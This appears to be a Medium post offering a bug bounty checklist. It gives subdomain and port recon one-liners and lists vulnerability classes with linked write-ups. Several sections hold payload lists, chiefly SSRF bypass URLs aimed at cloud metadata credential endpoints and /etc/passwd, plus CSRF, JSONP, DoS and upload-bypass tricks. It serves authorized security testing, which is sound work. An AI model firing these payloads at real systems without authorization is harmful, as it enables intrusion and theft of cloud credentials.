BUG BOUNTY CHECK LIST BY C1

RECON

Subdomian

crt.sh | %.yahoo.com

Free CT Log Certificate Search Tool from Sectigo (formerly Comodo CA)

crt.sh | %api%%.yahoo.com

Free CT Log Certificate Search Tool from Sectigo (formerly Comodo CA)

curl https://www.threatcrowd.org/searchApi/v2/domain/report/\?domain=$1 |jq .subdomains |grep -o ‘\w.*$1’curl https://api.hackertarget.com/hostsearch/\?q\=$1 | grep -o '\w.*$1'
curl https://crt.sh/?q=%.$1 | grep "$1" | cut -d '>' -f2 | cut -d '<' -f1 | grep -v " " | sort -ucurl https://certspotter.com/api/v0/certs?domain=$1 | grep -o '\[\".*\"\]'

tomnomnom/httprobe

Take a list of domains and probe for working http and https servers. ▶ go get -u github.com/tomnomnom/httprobe httprobe…

aboul3la/Sublist3r

Sublist3r is a python tool designed to enumerate subdomains of websites using OSINT. It helps penetration testers and…

gwen001/github-search

You can’t perform that action at this time. You signed in with another tab or window. You signed out in another tab or…

GitHub tools collection

This is the current thread in the bug hunter community: how to find sensitive informations on GitHub. Understand how to…

IP

Port

robertdavidgraham/masscan

This is an Internet-scale port scanner. It can scan the entire Internet in under 6 minutes, transmitting 10 million…

Nmap: the Network Mapper — Free Security Scanner

Nmap 7.80 was released for DEFCON 27! [release notes | download] Nmap 7.70 is now available! [release notes | download]…

nmap -sV -T3 -Pn -p2075,2076,6443,3868,3366,8443,8080,9443,9091,3000,8000,5900,8081,6000,10000,8181,3306,5000,4000,8888,5432,15672,9999,161,4044,7077,4040,9000,8089,443,7447,7080,8880,8983,5673,7443,19000,19080 ${target}

Endpoint

curl http://web.archive.org/cdx/search/cdx/search/cds?url=*.$1/*&output=text&fl=original&collapse=urlkey
curl http://index.commoncrawl.org/CC-MAIN-2018-22-index\?url\=\*.$1\&output\=json |jq .url

Threezh1/JSFinder

JSFinder is a tool for quickly extracting URLs and subdomains from JS files on a website.

maurosoria/dirsearch

Current Release: v0.3.9 (2019.11.26) dirsearch is a simple command line tool designed to brute force directories and…

C1h2e1/MyFuzzingDict

You can’t perform that action at this time. You signed in with another tab or window. You signed out in another tab or…

HUNTING

  • SSRF
  • CSRF(CORS,JSONP hijacking)
  • SQLi
  • XSS(DOM,Stored,Reflectd)
  • Weak Password
  • Unauthorized access
  • IDOR
  • Open redirect
  • Information Disclosure
  • XXE
  • File Upload
  • Subdomain Takeover
  • BLH
  • HTTP Requests Smuggling
  • CRLF
  • Auth Bypass
  • DOS
  • LFI
  • Command injection
  • Race Condition
  • S3 Bucket
  • Logic Flaw
  • SSTI

SSRF

Open redirect/SSRF payload generator

Edit description

white@black.com ==> black[.]com 
black[.]com?white[.]com ==> black[.]com
black[.]com#white.com ==> black[.]com Tips By @____cypher____
http://127.0.0.1
http://localhost
https://127.0.0.1/
http://127.127.127.127
http://127.0.1.3
http://127.0.0.0https://localhost/
http://[::]:80/
http://127.0.0.1.nip.io
http://[0:0:0:0:0:ffff:127.0.0.1]
http://spoofed.burpcollaborator.net
http://0177.0.0.1/
http://2130706433/
http://0/
https://10.0.0.1.xip.io
http://1.1.1.1 &@2.2.2.2# @3.3.3.3/
urllib2 : 1.1.1.1
requests + browsers : 2.2.2.2
urllib : 3.3.3.3<?php
header("Location: http://127.0.0.1");
?>http://ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ = example.com
List:
① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ ⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ ⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛ ⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵ Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿
http://169.254.169.254/latest/meta-data/iam/security-credentials/aws-elasticbeanorastalk-ec2-role
http://169.254.169.254/computeMetadata/v1/
http://metadata.google.internal/computeMetadata/v1/
http://metadata/computeMetadata/v1/
http://metadata.google.internal/computeMetadata/v1/instance/hostname
http://metadata.google.internal/computeMetadata/v1/instance/id
http://metadata.google.internal/computeMetadata/v1/project/project-id
File protocol to read local file
file:///etc/passwd
http://100.100.100.200/latest/meta-data/

swisskyrepo/PayloadsAllTheThings

Server Side Request Forgery or SSRF is a vulnerability in which an attacker forces a server to perform requests on…

My First SSRF Using DNS Rebinding

Imagine you are a computer :D People give you URLs and you load them Of course you won’t load url that points to your…

cujanovic/SSRF-Testing

http://google.com:80+&@127.88.23.245:22/#+@google.com:80/ http://127.88.23.245:22/+&@google.com:80#+@google.com:80/…

CSRF(CORS,JSONP hijacking)

Delete CSRF token
Null token parameter
Modify request method Form GET to POST or PUT etc.
Replace token with any string of the same length as token
Fixed token Every user's token can be shared

Think Outside the Scope: Advanced CORS Exploitation Techniques

Hi everyone,

kapytein/jsonp

jsonp is a Burp Extension which tries to discover JSONP functionality behind JSON endpoints. It does so by appending…

callback=gh0stkey
cb=gh0stkey
jsonp=gh0stkey
jsonpcallback=gh0stkey
jsonpcb=gh0stkey
jsonp_cb=gh0stkey
json=gh0stkey
jsoncallback=gh0stkey
jcb=gh0stkey
call=gh0stkey
cb_=gh0stkey
_cb_=gh0stkey

SQLi

tennc/fuzzdb

You can’t perform that action at this time. You signed in with another tab or window. You signed out in another tab or…

XSS in hidden input fields

Gareth Heyes | 16 November 2015 at 11:25 UTC Updated: 14 June 2019 at 12:03 UTC At PortSwigger, we regularly run…

XSS in Oculus Rifts CDN

After looking through Oculus Rifts site I came across the developer section for making apps. I quickly made a test app…

XSS Hunter

Edit description

C1h2e1/c1h2e1.github.io

Contribute to C1h2e1/c1h2e1.github.io development by creating an account on GitHub.

Weak Password

Unauthorized access

IDOR

Quitten/Autorize

Autorize is an automatic authorization enforcement detection extension for Burp Suite. It was written in Python by…

One Way to Find Hidden IDOR Vulnerability

I received an invitation for an internal project, i found an interesting vulnerability in this project. After…

Open redirect

C1h2e1/c1h2e1.github.io

Contribute to C1h2e1/c1h2e1.github.io development by creating an account on GitHub.

Open Redirect Cheat Sheet

Hi, this is a cheat sheet for Open redirect vulnerabilities. It’s a first draft. I will update it every time I find a…

Replace whitelisted.com with your target

XXE

  1. Upload File

Exploiting XXE with Excel

XML External Entity attacks are very common, particularly through HTTP-based APIs, and we regularly encounter and…

U.S. Dept Of Defense disclosed on HackerOne: XXE in DoD website…

Summary:** XXE in https://█████ **Description:** A malicious user can modify an XML-based request to include XML…

Starbucks disclosed on HackerOne: XXE at…

johnstone discovered that both ecjobs.starbucks.com.cn/retail/hxpublic_v6/hxdynamicpage6.aspx &…

File Upload

Exploiting File Uploads Pt. 1 — MIME Sniffing to Stored XSS #bugbounty

While bug hunting on a private program I was able to find a Stored XSS vulnerability through a file upload…

Exploiting File Uploads Pt. 2 — A Tale of a $3k worth RCE.

In this post I show how I was able to find a Remote Code Execution vulnerability on a private program through…

  • Add dot after the file name
  • File name with special symbol before or after
  • Delete meta-data
  • Race condition

modzero/mod0BurpUploadScanner

A Burp Suite Pro extension to do security tests for HTTP file uploads. Table of Contents Testing web applications is a…

Subdomain Takeover

Echocipher/Subdomain-Takeover

一个子域名接管检测工具 author:Echocipher mail: echocipher@163.com blog: https://echocipher.github.io 本项目是我为…

haccer/subjack

Subjack is a Subdomain Takeover tool written in Go designed to scan a list of subdomains concurrently and identify ones…

BLH

Command Injection Through BLH

Hi I am Shankar R ( @trapp3r_hat) from Tirunelveli (India). I hope you all doing good. I am a security researcher from…

Broken Link Hijacking — How expired links can be exploited.

Broken Link Hijacking (BLH) exists whenever a target links to an expired domain or page. Broken Link Hijacking comes in…

stevenvachon/broken-link-checker

Find broken links, missing images, etc within your HTML. ✅ Complete: Unicode, redirects, compression, basic auth…

HTTP Requests Smuggling

Write up of two HTTP Requests Smuggling

This article about how I found two sites for HTTP Request Smuugling

CRLF

#BugBounty — Exploiting CRLF Injection can lands into a nice bounty

Hi Guys,

Auth Bypass

Phabricator disclosed on HackerOne: Bypass auth.email-domains

Email addresses are stored as `VARCHAR(128)`. However, Phabricator does not verify the length of an email address upon…

DOS

QIWI disclosed on HackerOne: apache access.log leakage via long…

Issue access.log is leaked by attacker who trying send many requests. #Explain: Honestly i don’t know how the bug is…

https://target.com/Verification/?high=100&weigh=100
https://target.com/Verification/?high=100000&weigh=1000000
response boom!
If there is no parameter to control the size, we can add it by ourselves
width=250&height=250
height=250
width=250
w=250&h=250
h=250
w=250
size=250&width=250&height=250
size=250&w=250&h=250
size=250
margin=250
margin=250&width=250&height=250
margin=250&w=250&h=250
size=250&margin=250
size=250&margin=250&width=250&height=250

[Writeup — FB] Crash web — app through application form of job application pages

It’s me again, after my first write-up bounty.

LFI

LFI Cheat Sheet

LFI stands for Local File Includes — it’s a file local inclusion vulnerability that allows an attacker to include files…

Race Condition

HackerOne disclosed on HackerOne: Race Condition in Flag Submission

Summary:** This report describes a Race Condition Vulnerability which allow an authenticated user to submit the same…

HackerOne disclosed on HackerOne: Race condition in performing…

Summary There exists a race condition in performing retests. By executing multiple requests to confirm a retest at the…

HPP

Testing for HTTP Parameter pollution (OTG-INPVAL-004)

This article is part of the new OWASP Testing Guide v4. Back to the OWASP Testing Guide v4…

--

--

Love podcasts or audiobooks? Learn on the go with our new app.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store